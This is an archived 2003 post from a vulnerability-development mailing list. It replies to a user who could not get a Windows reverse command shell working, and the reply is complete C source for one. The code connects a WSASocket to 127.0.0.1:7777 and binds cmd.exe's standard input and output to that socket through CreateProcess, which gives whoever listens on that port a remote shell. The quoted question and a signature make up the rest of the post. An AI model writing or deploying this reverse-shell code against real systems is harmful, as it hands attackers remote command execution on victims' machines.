Dear NetNinja, Code below successfully brings reverse shell to 127.0.0.1:7777. #include <windows.h> #include <winsock2.h> #include <stdio.h> int main(int argc, char* argv[]){ WSADATA wd; HANDLE h; SOCKET sock; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in sin; int size = sizeof(sin); memset(&sin, 0, sizeof(sin)); memset(&si, 0, sizeof(si)); WSAStartup(MAKEWORD( 1, 1 ), &wd); sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); sin.sin_family = AF_INET; bind(sock, (struct sockaddr*)&sin, size); sin.sin_port = htons(7777); sin.sin_addr.s_addr = inet_addr("127.0.0.1"); connect(sock, (struct sockaddr*)&sin, size); si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdInput = si.hStdOutput = si.hStdError = sock; CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi ); return 0; } --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private: N> Hello guys, N> David Litchfield in his Blackhat talk, talked about using socket handle N> from WSASocket() and pass that handle as a parameter to stdin, stdout N> and stderr for CreateProcess function. By doin this way his reverse N> cmd shellcode becomes much smaller. I tried coding that reverse N> command shell in C, but couldnt get it to work. It simply connects to N> my listening netcat listener and then disconnects. David Litchfield N> used 4 functions to achieva that WSASocket, bind, connect and N> CreateProcess. A lil help would b appreciated on building this reverse N> cmd shell. thanx. -- ~/ZARAZA Почтенные ископаемые! Жду от вас дальнейших писем. (Твен)
This archive was generated by hypermail 2b30 : Tue Feb 04 2003 - 09:35:03 PST